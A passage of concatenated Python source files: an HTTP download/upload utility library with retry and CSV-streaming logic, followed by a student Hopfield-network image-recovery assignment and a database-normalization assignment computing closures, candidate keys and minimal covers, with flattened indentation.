raw_response = response.raw
while True:
chunk = raw_response.read(chunk_size, decode_content=True)
if not chunk:
break
chunk_total_sum += chunk_size
json_raw_file_w.write(chunk)
json_raw_file_w.flush()
os.fsync(json_raw_file_w.fileno())
log.debug(
"{0}: By Chunk: Completed".format(request_label),
extra={
'file_path': tmp_json_file_path,
}
)
break
except requests.exceptions.ChunkedEncodingError as chunked_encoding_ex:
error_exception = base_class_name(chunked_encoding_ex)
error_details = get_exception_message(chunked_encoding_ex)
log.warning(
"{0}: Error: {1}".format(request_label, error_exception),
extra={
'error_details': error_details,
'chunk_total_sum': chunk_total_sum,
}
)
if not _tries:
log.error(
"{0}: Exhausted Retries: Error: {1}".format(request_label, error_exception),
)
raise
except http_client.IncompleteRead as incomplete_read_ex:
error_exception = base_class_name(incomplete_read_ex)
error_details = get_exception_message(incomplete_read_ex)
log.warning(
"{0}: IncompleteRead".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
'chunk_total_sum': chunk_total_sum,
}
)
if not _tries:
log.error(
"{0}: Exhausted Retries: Error: {1}".format(request_label, error_exception),
)
raise
except requests.exceptions.RequestException as request_ex:
log.error(
"{0}: Request Exception".format(request_label),
extra={
'error_exception': base_class_name(request_ex),
'error_details': get_exception_message(request_ex),
'chunk_total_sum': chunk_total_sum,
}
)
raise
except Exception as ex:
log.error(
"{0}: Unexpected Exception".format(request_label),
extra={
'error_exception': base_class_name(ex),
'error_details': get_exception_message(ex),
'chunk_total_sum': chunk_total_sum,
}
)
raise
if not _tries:
log.error(
"{0}: Exhausted Retries".format(request_label),
extra={
'tries': _tries,
'request_url': request_url,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Exhausted Retries: {1}".format(request_label, request_url),
error_request_curl=self.built_request_curl,
error_code=RequestsFortifiedErrorCodes.REQ_ERR_RETRY_EXHAUSTED
)
log.info(
"{0}: Performing Retry".format(request_label),
extra={
'tries': _tries,
'delay': _delay,
'request_url': request_url,
}
)
time.sleep(_delay)
tmp_json_file_size = os.path.getsize(tmp_json_file_path)
bom_enc, bom_len, bom_header = detect_bom(tmp_json_file_path)
log.info(
"{0}: By Chunk: Completed: Details".format(request_label),
extra={
'file_path': tmp_json_file_path,
'file_size': bytes_to_human(tmp_json_file_size),
'chunk_total_sum': chunk_total_sum,
'bom_encoding': bom_enc,
}
)
if bom_enc == 'gzip':
tmp_json_gz_file_path = "%s.gz" % tmp_json_file_path
os.rename(src=tmp_json_file_path, dst=tmp_json_gz_file_path)
with open(file=tmp_json_file_path, mode=mode_write, encoding=encoding_write) as json_file_w:
log.debug(
"{0}: GZip: Started".format(request_label),
extra={
'file_path': tmp_json_file_path,
}
)
with gzip.open(tmp_json_gz_file_path, 'r') as gzip_file_r:
json_file_w.write(gzip_file_r.read())
response_extra = {
'file_path': tmp_json_file_path,
'file_size': bytes_to_human(tmp_json_file_size),
}
log.info(
"{0}: Read Downloaded".format(request_label),
extra=response_extra
)
json_download = None
with open(tmp_json_file_path, mode='r') as json_file_r:
json_file_content = json_file_r.read()
try:
json_download = json.loads(json_file_content)
except ValueError as json_decode_ex:
pprint(json_file_content)
response_extra.update({
'json_file_content': json_file_content,
'json_file_content_len': len(json_file_content)
})
handle_json_decode_error(
response_decode_ex=json_decode_ex,
response=response,
response_extra=response_extra,
request_label=request_label,
request_curl=self.built_request_curl
)
except Exception as ex:
pprint(json_file_content)
response_extra.update({
'json_file_content': json_file_content,
'json_file_content_len': len(json_file_content)
})
log.error(
"{0}: Failed: Exception".format(request_label),
extra=response_extra,
)
handle_json_decode_error(
response_decode_ex=ex,
response=response,
response_extra=response_extra,
request_label=request_label,
request_curl=self.built_request_curl
)
response_extra.update({'json_file_content_len': len(json_download)})
log.info(
"{0}: Finished".format(request_label),
extra=response_extra
)
return json_download
def download_csv(
self,
response,
tmp_directory,
tmp_csv_file_name,
request_label=None,
encoding_write=None,
decode_unicode=False,
):
_request_label = "Download CSV"
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.debug(
"{0}: Start".format(request_label)
)
if not os.path.exists(tmp_directory):
os.mkdir(tmp_directory)
tmp_csv_file_path = "{0}/{1}".format(tmp_directory, tmp_csv_file_name)
if os.path.exists(tmp_csv_file_path):
log.debug(
"{0}: Removing previous CSV".format(request_label),
extra={'file_path': tmp_csv_file_path},
)
os.remove(tmp_csv_file_path)
mode_write = 'wb' if encoding_write is None else 'w'
log.debug(
"{0}: Details".format(request_label),
extra={
'file_path': tmp_csv_file_path,
'mode_write': mode_write,
'encoding_write': encoding_write,
}
)
chunk_total_sum = 0
with open(file=tmp_csv_file_path, mode=mode_write, encoding=encoding_write) as csv_file_wb:
log.debug(
"{0}: By Chunk: Started".format(request_label),
extra={
'file_path': tmp_csv_file_path,
'request_label': request_label
}
)
error_exception = None
error_details = None
try:
for chunk in response.iter_content(chunk_size=8192, decode_unicode=decode_unicode):
if not chunk:
break
chunk_total_sum += 8192
csv_file_wb.write(chunk)
csv_file_wb.flush()
os.fsync(csv_file_wb.fileno())
log.debug(
"{0}: By Chunk: Completed".format(request_label),
extra={
'file_path': tmp_csv_file_path,
}
)
except requests.exceptions.ChunkedEncodingError as chunked_encoding_ex:
error_exception = base_class_name(chunked_encoding_ex)
error_details = get_exception_message(chunked_encoding_ex)
log.warning(
"{0}: ChunkedEncodingError".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
'chunk_total_sum': bytes_to_human(chunk_total_sum),
}
)
return (None, 0)
except http_client.IncompleteRead as incomplete_read_ex:
error_exception = base_class_name(incomplete_read_ex)
error_details = get_exception_message(incomplete_read_ex)
log.warning(
"{0}: IncompleteRead".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
'chunk_total_sum': bytes_to_human(chunk_total_sum),
}
)
return (None, 0)
except requests.exceptions.RequestException as request_ex:
log.error(
"{0}: Request Exception".format(request_label),
extra={
'error_exception': base_class_name(request_ex),
'error_details': get_exception_message(request_ex),
'chunk_total_sum': bytes_to_human(chunk_total_sum),
}
)
raise
except Exception as ex:
log.error(
"{0}: Unexpected Exception".format(request_label),
extra={
'error_exception': base_class_name(ex),
'error_details': get_exception_message(ex),
'chunk_total_sum': bytes_to_human(chunk_total_sum),
}
)
raise
tmp_csv_file_size = os.path.getsize(tmp_csv_file_path)
bom_enc, bom_len, bom_header = detect_bom(tmp_csv_file_path)
log.info(
"{0}: By Chunk: Completed: Details".format(request_label),
extra={
'file_path': tmp_csv_file_path,
'file_size': bytes_to_human(tmp_csv_file_size),
'chunk_total_sum': bytes_to_human(chunk_total_sum),
'bom_encoding': bom_enc
}
)
log.debug(
"{0}: Download CSV: Usage".format(request_label),
extra=env_usage(tmp_directory)
)
tmp_csv_file_name_wo_ext = \
os.path.splitext(
os.path.basename(tmp_csv_file_name)
)[0]
tmp_csv_file_path_wo_bom = "{0}/{1}_wo_bom.csv".format(tmp_directory, tmp_csv_file_name_wo_ext)
if os.path.exists(tmp_csv_file_path_wo_bom):
os.remove(tmp_csv_file_path_wo_bom)
bom_enc, bom_len = remove_bom(tmp_csv_file_path, tmp_csv_file_path_wo_bom)
log.debug(
"{0}: Encoding".format(request_label),
extra={
'bom_enc': bom_enc,
'bom_len': bom_len
}
)
if bom_len > 0:
tmp_csv_file_path = tmp_csv_file_path_wo_bom
return (tmp_csv_file_path, tmp_csv_file_size)
def stream_csv(
self,
request_url,
request_params,
csv_delimiter=',',
request_retry=None,
request_headers=None,
request_label=None,
chunk_size=1024,
decode_unicode=False,
remove_bom_length=0
):
"""Stream CSV and Yield JSON
Args:
request_url:
request_params:
csv_delimiter:
request_retry:
request_headers:
chunk_size:
decode_unicode:
remove_bom_length:
        Yields:
            Each CSV data row as a dict keyed by the CSV header.
        """
_request_label = "Stream CSV"
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.info(
"{0}: Start".format(request_label),
extra={'report_url': request_url}
)
response = self.requests_client.request(
request_method='GET',
request_url=request_url,
request_params=request_params,
request_retry=request_retry,
request_headers=request_headers,
stream=True,
request_label="{0}: Request".format(request_label)
)
log.info(
"{0}: Response".format(request_label),
extra={
'response_status_code': response.status_code,
'response_headers': response.headers,
'report_url': request_url
}
)
request_curl = command_line_request_curl(
request_method='GET',
request_url=request_url,
request_params=request_params,
request_headers=request_headers,
)
validate_response(response=response, request_curl=request_curl, request_label="Stream CSV")
response_content_type = response.headers.get('Content-Type', None)
response_transfer_encoding = response.headers.get('Transfer-Encoding', None)
response_http_status_code = response.status_code
log.debug(
"{0}: Status: Details".format(request_label),
extra={
'response_content_type': response_content_type,
'response_transfer_encoding': response_transfer_encoding,
'response_http_status_code': response_http_status_code
}
)
log.debug("{0}: Usage".format(request_label), extra=env_usage())
line_count = 0
csv_keys_str = None
csv_keys_list = None
csv_keys_list_len = None
pre_str_line = None
for bytes_line in response.iter_lines(chunk_size=chunk_size, decode_unicode=decode_unicode):
if bytes_line: # filter out keep-alive new chunks
line_count += 1
str_line = bytes_line.decode("utf-8")
if line_count == 1:
if remove_bom_length > 0:
str_line = str_line[remove_bom_length:]
csv_keys_list = str_line.split(csv_delimiter)
csv_keys_list = [csv_key.strip() for csv_key in csv_keys_list]
csv_keys_list_len = len(csv_keys_list)
continue
if pre_str_line is not None:
str_line = pre_str_line + str_line
pre_str_line = None
csv_values_str = str_line.replace('\n', ' ').replace('\r', ' ')
csv_values_str_io = io.StringIO(csv_values_str)
reader = csv.reader(csv_values_str_io, delimiter=csv_delimiter)
csv_values_list = None
for row in reader:
csv_values_list = row
csv_values_list_len = len(csv_values_list)
if csv_values_list_len < csv_keys_list_len:
pre_str_line = str_line
continue
if csv_keys_list_len != csv_values_list_len:
log.error(
"{0}: Mismatch: CSV Key".format(request_label),
extra={
'line': line_count,
'csv_keys_list_len': csv_keys_list_len,
'csv_keys_str': csv_keys_str,
'csv_keys_list': csv_keys_list,
'csv_values_list_len': csv_values_list_len,
'csv_values_str': csv_values_str,
'csv_values_list': csv_values_list,
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Mismatch: CSV Key '{1}': Values '{2}'".format(request_label, csv_keys_str, csv_values_str),
error_code=RequestsFortifiedErrorCodes.REQ_ERR_UNEXPECTED_VALUE
)
json_data_row = {}
for idx, csv_key in enumerate(csv_keys_list):
csv_value = csv_values_list[idx]
json_data_row.update({csv_key: csv_value.strip('"')})
yield json_data_row
```
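A minimal usage sketch (not part of the original file) for the streaming helper above. The enclosing class is not shown here, so `downloader` stands in for an instance of whatever client exposes `stream_csv`; the URL and parameters are placeholders.
```python
# Hypothetical wiring: `downloader` is assumed to be an instance of the class
# that defines stream_csv above; the report URL and params are placeholders.
rows = downloader.stream_csv(
    request_url="https://example.com/report.csv",
    request_params={"format": "csv"},
    csv_delimiter=",",
    request_label="Example Report",
)
for row in rows:  # each yielded row is a dict keyed by the CSV header line
    print(row)
```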
#### File: requests-fortified/pyfortified_requests/pyfortified_requests_upload.py
```python
import logging
from pyfortified_logging import (LoggingFormat, LoggingOutput)
from pyfortified_requests import (
__python_required_version__,
RequestsFortified,
)
from pyfortified_requests.errors import (
get_exception_message,
print_traceback,
RequestsFortifiedErrorCodes,
)
from pyfortified_requests.exceptions.custom import (
RequestsFortifiedBaseError,
RequestsFortifiedModuleError,
)
from pyfortified_requests.support import (
base_class_name,
mv_request_retry_excps_func,
python_check_version,
REQUEST_RETRY_EXCPS,
REQUEST_RETRY_HTTP_STATUS_CODES,
)
log = logging.getLogger(__name__)
python_check_version(__python_required_version__)
class RequestsFortifiedUpload(object):
__mv_request = None
def __init__(
self,
logger_level=logging.INFO,
logger_format=LoggingFormat.JSON,
logger_output=LoggingOutput.STDOUT_COLOR
):
self.mv_request = RequestsFortified(
logger_format=logger_format,
logger_level=logger_level,
logger_output=logger_output
)
@property
def logger(self):
return self.mv_request.logger
@property
def mv_request(self):
return self.__mv_request
@mv_request.setter
def mv_request(self, value):
self.__mv_request = value
def request(self, **kwargs):
return self.mv_request.request(**kwargs)
@property
def built_request_curl(self):
return self.mv_request.built_request_curl
def request_upload_json_file(
self,
upload_request_url,
upload_data_file_path,
upload_data_file_size,
is_upload_gzip,
request_label=None,
upload_timeout=None
):
"""Upload File to requested URL.
:param upload_request_url:
:param upload_data_file_path:
:param upload_data_file_size:
:param is_upload_gzip:
:param request_label:
:param upload_timeout:
:return:
"""
_request_label = "Request Upload JSON File"
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
request_retry_excps = REQUEST_RETRY_EXCPS
request_retry_http_status_codes = REQUEST_RETRY_HTTP_STATUS_CODES
upload_request_retry = {"timeout": 60, "tries": -1, "delay": 60}
upload_request_headers = {'Content-Length': "{0}".format(upload_data_file_size)}
if is_upload_gzip:
upload_request_headers.update({'Content-Type': 'application/gzip'})
else:
upload_request_headers.update({'Content-Type': 'application/json; charset=utf8'})
if upload_timeout:
upload_request_retry["timeout"] = int(upload_timeout)
upload_extra = {
'upload_request_url': upload_request_url,
'upload_data_file_path': upload_data_file_path,
'upload_data_file_size': upload_data_file_size,
'upload_request_retry': upload_request_retry,
'upload_request_headers': upload_request_headers
}
log.info(
"{0}: Start".format(request_label),
extra=upload_extra
)
try:
with open(upload_data_file_path, 'rb') as upload_fp:
response = self.mv_request.request(
request_method='PUT',
request_url=upload_request_url,
request_params=None,
request_data=upload_fp,
request_retry=upload_request_retry,
request_headers=upload_request_headers,
request_retry_excps=request_retry_excps,
request_retry_http_status_codes=request_retry_http_status_codes,
request_retry_excps_func=mv_request_retry_excps_func,
allow_redirects=False,
build_request_curl=False,
request_label=request_label
)
except RequestsFortifiedBaseError as tmv_ex:
tmv_ex_extra = tmv_ex.to_dict()
tmv_ex_extra.update({'error_exception': base_class_name(tmv_ex)})
log.error("{0}: Failed".format(request_label), extra=tmv_ex_extra)
raise
except Exception as ex:
print_traceback(ex)
log.error(
"{0}: Failed: Unexpected".format(request_label),
extra={
'error_exception': base_class_name(ex),
'error_details': get_exception_message(ex)
}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Failed: Unexpected: {1}: {2}".format(request_label, base_class_name(ex), get_exception_message(ex)),
errors=ex,
error_code=RequestsFortifiedErrorCodes.REQ_ERR_UPLOAD_DATA
)
log.info(
"{0}: Finished".format(request_label)
)
return response
def request_upload_data(
self,
upload_request_url,
upload_data,
upload_data_size,
request_label=None,
upload_timeout=None,
build_request_curl=False
):
"""Upload Data to requested URL.
:param upload_request_url:
:param upload_data:
:param upload_data_size:
:param upload_timeout:
:return:
"""
_request_label = 'Request Upload Data'
request_label = "{0}: {1}".format(request_label, _request_label) if request_label is not None else _request_label
log.info(
"{0}: Start".format(request_label),
extra={
'upload_data_size': upload_data_size,
'upload_request_url': upload_request_url,
}
)
request_retry_excps = REQUEST_RETRY_EXCPS
request_retry_http_status_codes = REQUEST_RETRY_HTTP_STATUS_CODES
upload_request_retry = {"timeout": 60, "tries": -1, "delay": 60}
request_headers = {
'Content-type': 'application/json; charset=utf8',
'Accept': 'text/plain',
'Content-Length': str(upload_data_size)
}
if upload_timeout:
upload_request_retry["timeout"] = int(upload_timeout)
try:
response = self.mv_request.request(
request_method='PUT',
request_url=upload_request_url,
request_params=None,
request_data=upload_data,
request_retry=upload_request_retry,
request_retry_excps=request_retry_excps,
request_retry_http_status_codes=request_retry_http_status_codes,
request_retry_excps_func=mv_request_retry_excps_func,
request_headers=request_headers,
allow_redirects=False,
build_request_curl=build_request_curl,
request_label=request_label
)
except RequestsFortifiedBaseError as tmv_ex:
tmv_ex_extra = tmv_ex.to_dict()
tmv_ex_extra.update({'error_exception': base_class_name(tmv_ex)})
log.error(
"{0}: Failed".format(request_label),
extra=tmv_ex_extra
)
raise
except Exception as ex:
print_traceback(ex)
log.error(
"{0}: Failed: Unexpected".format(request_label),
extra={'error_exception': base_class_name(ex),
'error_details': get_exception_message(ex)}
)
raise RequestsFortifiedModuleError(
error_message="{0}: Failed: Unexpected: {1}: {2}".format(request_label, base_class_name(ex), get_exception_message(ex)),
errors=ex,
error_code=RequestsFortifiedErrorCodes.REQ_ERR_UPLOAD_DATA
)
log.info("{0}: Finished".format(request_label))
return response
```
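A minimal usage sketch (not part of the original file) of `RequestsFortifiedUpload.request_upload_data`. The import path is inferred from the file location above and the endpoint URL is a placeholder.
```python
import json

# Assumed import path, based on the file location shown above.
from pyfortified_requests.pyfortified_requests_upload import RequestsFortifiedUpload

payload = json.dumps({"hello": "world"}).encode("utf-8")
uploader = RequestsFortifiedUpload()
response = uploader.request_upload_data(
    upload_request_url="https://example.com/upload",  # placeholder endpoint
    upload_data=payload,
    upload_data_size=len(payload),
    request_label="Example Upload",
)
# `response` is whatever the underlying requests client returned for the PUT.
```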
#### File: pyfortified_requests/support/retry_exception.py
```python
import logging
import requests
from pyfortified_requests import (
__python_required_version__,
)
from pyfortified_requests.errors import (
get_exception_message,
RequestsFortifiedErrorCodes,
)
from pyfortified_requests.exceptions.custom import (
RequestsFortifiedBaseError,
)
from pyfortified_requests.support.utils import (
base_class_name,
python_check_version,
)
log = logging.getLogger(__name__)
python_check_version(__python_required_version__)
def mv_request_retry_excps_func(excp, request_label=None):
"""Request Retry Exception Function
:param excp:
:param request_label:
:return:
"""
_request_label = 'Request Upload Exception'
request_label = '{}: {}'.format(request_label, _request_label) if request_label is not None else _request_label
error_exception = base_class_name(excp)
error_details = get_exception_message(excp)
if isinstance(excp, RequestsFortifiedBaseError):
log.debug(
"{0}: Expected".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
else:
log.debug(
"{0}: Unexpected".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
if isinstance(excp, requests.exceptions.ConnectionError):
if error_details.find('RemoteDisconnected') >= 0 or error_details.find('ConnectionResetError') >= 0:
log.debug(
"{0}: Retry".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
return True
if isinstance(excp, RequestsFortifiedBaseError) and excp.error_code == RequestsFortifiedErrorCodes.REQ_ERR_REQUEST_CONNECT:
if error_details.find('RemoteDisconnected') >= 0 or error_details.find('ConnectionResetError') >= 0:
log.debug(
"{0}: Retry".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
return True
log.debug(
"{0}: No Retry".format(request_label),
extra={
'error_exception': error_exception,
'error_details': error_details,
}
)
return False
```
|
{
"source": "Jeff010101/CS5340-Uncertainty-Modeling-in-AI",
"score": 3
}
|
#### File: CS5340-Uncertainty-Modeling-in-AI/Hopfield/code.py
```python
import matplotlib
matplotlib.use('Agg')
import glob
import matplotlib.pyplot as plt
from PIL import Image, ImageOps
#Autograd
import autograd.numpy as np
from autograd import grad, jacobian, hessian
from autograd.scipy.stats import norm
from scipy.optimize import minimize
def load_image(fname):
img = Image.open(fname).resize((32, 32))
img_gray = img.convert('L')
img_eq = ImageOps.autocontrast(img_gray)
img_eq = np.array(img_eq.getdata()).reshape((img_eq.size[1], -1))
return img_eq
def binarize_image(img_eq):
img_bin = np.copy(img_eq)
img_bin[img_bin < 128] = -1
img_bin[img_bin >= 128] = 1
return img_bin
def add_corruption(img):
img = img.reshape((32, 32))
t = np.random.choice(3)
if t == 0:
i = np.random.randint(32)
img[i:(i + 8)] = -1
elif t == 1:
i = np.random.randint(32)
img[:, i:(i + 8)] = -1
else:
mask = np.sum([np.diag(-np.ones(32 - np.abs(i)), i)
                       for i in np.arange(-4, 5)], 0).astype(int)
img[mask == -1] = -1
return img.ravel()
def learn_hebbian(imgs):
img_size = np.prod(imgs[0].shape)
######################################################################
######################################################################
weights = np.zeros((img_size, img_size))
bias = np.zeros(img_size)
# Complete this function
# You are allowed to modify anything between these lines
# Helper functions are allowed
#flatten image
imgs_f = np.reshape(imgs,(len(imgs),img_size))
for img in imgs_f:
outer = np.outer(img,img)
weights += outer
diagW = np.diag(np.diag(weights))
weights = weights - diagW
weights /= len(imgs)
#######################################################################
#######################################################################
return weights, bias
def sigma(x):
    return 1 / (1 + np.exp(-x))
from scipy.optimize import minimize
def learn_maxpl(imgs):
img_size = np.prod(imgs[0].shape)
######################################################################
######################################################################
weights = np.zeros((img_size, img_size))
bias = np.zeros(img_size)
# Complete this function
# You are allowed to modify anything between these lines
# Helper functions are allowed
# Avoid "overflow encountered in exp"
old_settings = np.seterr(all='ignore')
# Define log PseudoLikelihood function
def neg_logPL(W,b):
SUM=0
for img in imgs:
#flatten image
img_f = np.reshape(img,(1,img_size))
for i in range(len(img_f[0])):
x=img_f[0][i]
X=np.copy(img_f)
X[0][i]=0
if x==1:
SUM=SUM+np.log(1/(1+np.exp(-np.sum(W[i]*X[0])+b[i])))
else:
SUM=SUM+np.log(1-1/(1+np.exp(-np.sum(W[i]*X[0])+b[i])))
return -SUM
# Gradient descent on neg_logPL
neg_logPL_dW=grad(neg_logPL,0)
neg_logPL_db=grad(neg_logPL,1)
W=np.zeros((img_size,img_size))
b=np.zeros((img_size))
n_iteration=5
alpha=0.01
for i in range(n_iteration):
dW=neg_logPL_dW(W,b)
db=neg_logPL_db(W,b)
W=W-(dW+np.transpose(dW))*alpha
b=b-db*alpha
weights, bias = W,b
#######################################################################
#######################################################################
return weights, bias
def plot_results(imgs, cimgs, rimgs, fname='result.png'):
'''
This helper function can be used to visualize results.
'''
img_dim = 32
assert imgs.shape[0] == cimgs.shape[0] == rimgs.shape[0]
n_imgs = imgs.shape[0]
fig, axn = plt.subplots(n_imgs, 3, figsize=[8, 8])
for j in range(n_imgs):
axn[j][0].axis('off')
axn[j][0].imshow(imgs[j].reshape(img_dim, img_dim), cmap='Greys_r')
axn[0, 0].set_title('True')
for j in range(n_imgs):
axn[j][1].axis('off')
axn[j][1].imshow(cimgs[j].reshape(img_dim, img_dim), cmap='Greys_r')
axn[0, 1].set_title('Corrupted')
for j in range(n_imgs):
axn[j][2].axis('off')
axn[j][2].imshow(rimgs[j].reshape((img_dim, img_dim)), cmap='Greys_r')
axn[0, 2].set_title('Recovered')
fig.tight_layout()
plt.savefig(fname)
def recover(cimgs, W, b):
img_size = np.prod(cimgs[0].shape)
######################################################################
######################################################################
rimgs = []
# Complete this function
# You are allowed to modify anything between these lines
# Helper functions are allowed
#######################################################################
#######################################################################
rimgs = cimgs.copy()
num_iter = 20
for i in range(num_iter):
for j in range(len(rimgs)):
rimgs[j] = -((np.sign(1/(1+np.exp(W.dot(rimgs[j])+b))-0.5))).astype(int)
rimgs = rimgs.reshape((len(rimgs),32,32))
return rimgs
def main():
# Load Images and Binarize
ifiles = sorted(glob.glob('C:/Users/User/OneDrive/NUS/course/CS5340/Assignment_2/images/*'))
timgs = [load_image(ifile) for ifile in ifiles]
imgs = np.asarray([binarize_image(img) for img in timgs])
# Add corruption
cimgs = []
for i, img in enumerate(imgs):
cimgs.append(add_corruption(np.copy(imgs[i])))
cimgs = np.asarray(cimgs)
# Recover 1 -- Hebbian
Wh, bh = learn_hebbian(imgs)
rimgs_h = recover(cimgs, Wh, bh)
np.save('hebbian.npy', rimgs_h)
plot_results(imgs, cimgs, rimgs_h, fname='C:/Users/User/OneDrive/NUS/course/CS5340/Assignment_2/result_1.png') #C:/Users/User/OneDrive/NUS/course/CS5340/Assignment_2/
# Recover 2 -- Max Pseudo Likelihood
Wmpl, bmpl = learn_maxpl(imgs)
rimgs_mpl = recover(cimgs, Wmpl, bmpl)
np.save('mpl.npy', rimgs_mpl)
plot_results(imgs, cimgs, rimgs_mpl, fname='C:/Users/User/OneDrive/NUS/course/CS5340/Assignment_2/result_2.png')
if __name__ == '__main__':
main()
```
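The Hebbian learner above uses the classic outer-product rule, W = (1/N) * sum_k outer(x_k, x_k) with the diagonal zeroed. A tiny self-contained sketch (not part of the assignment code) checking that stored bipolar patterns are fixed points of the sign update used at recall time:
```python
import numpy as np

# Two bipolar patterns to store.
patterns = np.array([[1, -1, 1, -1],
                     [1, 1, -1, -1]])

# Hebbian rule: accumulate outer products, zero the diagonal, average.
W = np.zeros((4, 4))
for p in patterns:
    W += np.outer(p, p)
np.fill_diagonal(W, 0)
W /= len(patterns)

# Each stored pattern should be a fixed point of the sign update.
for p in patterns:
    recalled = np.where(W.dot(p) >= 0, 1, -1)
    assert np.array_equal(recalled, p)
```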
|
{
"source": "Jeff010101/CS5421-database-tuning",
"score": 2
}
|
#### File: CS5421-database-tuning/Normalization/project2_3.py
```python
student_no = 'XXXX'
## Determine the closure of set of attribute S given the schema R and functional dependency F
def closure(R, F, S):
Omega = F.copy()
Sigma = set(S)
f_p = []
while True:
for f in Omega:
if set(f[0]).issubset(Sigma):
f_p = f
break
if len(f_p) == 0:
break
Omega.remove(f_p)
Sigma.update(set(f_p[1]))
f_p = []
return sorted(Sigma)
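# Example (not part of the original solution): with R = ['A', 'B', 'C', 'D'] and
# F = [[['A', 'B'], ['C']], [['C'], ['D']]], closure(R, F, ['A', 'B']) keeps applying
# FDs whose LHS is already contained in the set: {A,B} -> {A,B,C} -> {A,B,C,D},
# so it returns ['A', 'B', 'C', 'D'].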
## Determine all the attribute closures, excluding superkeys that are not candidate keys, given the schema R and functional dependencies F
# Get subsets
# input: set A; output: all subsets of set A
def Subset(items):
if len(items) == 0:
return [[]]
subsets = []
first_elt = items[0] #first element
rest_list = items[1:]
    for partial_subset in Subset(rest_list):
        subsets.append(partial_subset)
        next_subset = partial_subset[:] + [first_elt]
        subsets.append(sorted(next_subset))
return sorted(subsets)
def all_closures(R, F):
subsets = Subset(R)
closures_all = []
key = []
for i in subsets:
if len(i)!=0:
closure_s = closure(R,F,i)
if len(closure_s) == len(R):
key.append(i)
else:
closures_all.append([i,closure_s])
    for i in key:  # remove superkeys that are not candidate keys
n = 0
for j in key:
if set(j).issubset(i):
n = n+1
if n==1:
closures_all.append([i,R])
return sorted(closures_all)
## Return the candidate keys of a given schema R and functional dependencies F.
## NOTE: This function is not graded for CS5421 students.
def candidate_keys(R, F):
subsets = Subset(R)
closures_all = []
key = []
for i in subsets:
if len(i)!=0:
closure_s = closure(R,F,i)
if len(closure_s) == len(R):
key.append(i)
else:
closures_all.append([i,closure_s])
candidate_key = []
for i in key:
n = 0
for j in key:
if set(j).issubset(i):
n = n+1
if n==1:
candidate_key.append(i)
return sorted(candidate_key)
## Return a minimal cover of the functional dependencies of a given schema R and functional dependencies F.
## sigma_1: make the RHS of each FD a singleton
def get_sigma1(R,FD):
FD_new = []
for i in FD:
for j in i[1]:
FD_new.append([i[0],[j]])
return FD_new
## sigma_2: simplify the LHS of each FD
# filter out trivial FDs (where the RHS is already contained in the LHS)
def filter_naive(FD):
FD_new = []
for i in FD:
indictor = True
if (set(i[1]).issubset(set(i[0]))):
indictor = False
if indictor:
FD_new.append(i)
return FD_new
# simplify LHS of a single FD
def LHS_simply(R,FD, FDs):
X = FD[0]
Y = FD[1]
X_rm_l = []
X_rm = []
for i in X:
S = set(X.copy())
S.remove(i)
B = list(S)
S1 = set(closure(R,FDs,B))
if set(Y).issubset(S1) or set(i).issubset(S1):
X_rm_l.append(i)
if len(X_rm_l)==0:
return []
else:
for i in X_rm_l:
S = set(X)
S.remove(i)
B = list(S)
X_rm_n = LHS_simply(R,[B,Y], FDs)
if len(X_rm_n)==0:
X_rm.append([i])
else:
for j in X_rm_n:
X_rm.append([i]+j)
return X_rm
def LHS_simply1(R,FD, FDs):
X = FD[0]
Y = FD[1]
simple = LHS_simply(R,FD, FDs)
simple_1 = []
for i in simple:
indictor = True
for j in simple_1:
if len(set(j)-set(i))==0:
indictor = False
if indictor:
simple_1.append(i)
X_sim = []
if len(simple_1)==0:
return [FD]
else:
for i in simple_1:
S = set(X)
for j in i:
S.remove(j)
B = list(S)
X_sim.append(sorted(B))
FD_return = []
for i in X_sim:
FD_return.append([i, Y])
if len(X_sim)==1:
return sorted(FD_return)
else:
return sorted(FD_return)
# simplify LHS of all FDs, get all cases in integrated form
def get_sigma2_integ(R,sigma_1,FD):
sigma_2 = []
for i in range(0,len(sigma_1)):
simple_LHS = LHS_simply1(R,sigma_1[i], FD)
#print(simple_LHS)
sigma_2.append(simple_LHS)
return sorted(sigma_2)
# get all cases of FDs
def cross_join(A):
C = []
if len(A) == 1:
for i in A[0]:
C.append([i])
else:
for i in A[0]:
B = cross_join(A[1:])
for j in B:
C.append(j+[i])
return C
### remove duplicate FDs, keeping one of each
def filter_same_dependence(FD):
FD_new = []
for i in FD:
indictor = True
#print(i)
X_1 = set(i[0])
Y_1 = set(i[1])
#print(i,FD_new)
for j in FD_new:
X_2 = set(j[0])
Y_2 = set(j[1])
#print(X_1,X_2,Y_1,Y_2)
if (len(X_1-X_2)==0 and len(X_2-X_1)==0) and (len(Y_1-Y_2)==0 and len(Y_2-Y_1)==0):
indictor = False
if indictor:
FD_new.append(i)
return sorted(FD_new)
def get_sigma2(R,sigma_1,FD):
A = get_sigma2_integ(R,sigma_1,FD)
C = sigma2_filter(A)
B = cross_join(C)
C_filter = []
for i in B:
C_filter.append(filter_same_dependence(i))
return sorted(C_filter)
# remove redundant FDs in sigma_2
# check whether FD_1 and FD_2 are the same set of FDs
def compare_FD(FD_1,FD_2):
if len(FD_1)!=len(FD_2):
return False
else:
A = filter_same_dependence(FD_1+FD_2)
#print(len(A),A)
if len(A) == len(FD_1):
return True
else:
return False
# filter sigma_2 cases, remove the same case
def sigma2_filter(sigma_2):
A = []
i = 0
A.append(sigma_2[0])
while(i <= len(sigma_2)-1):
for j in range(i+1, len(sigma_2)+1):
if j>len(sigma_2)-1:
i = j
break
else:
indictor = compare_FD(sigma_2[i],sigma_2[j])
#print(i,j,indictor)
if (indictor==False):
A.append(sigma_2[j])
i = j
break
return A
def get_sigma3_case(FD,labels):
sigma = []
for i in labels:
sigma.append(FD[i])
return sigma
# remove redundant FDs and get the different cases
def remove(R,FD,keep_label):
keep_label_set = set(keep_label)
#print(keep_label_set)
label_all = []
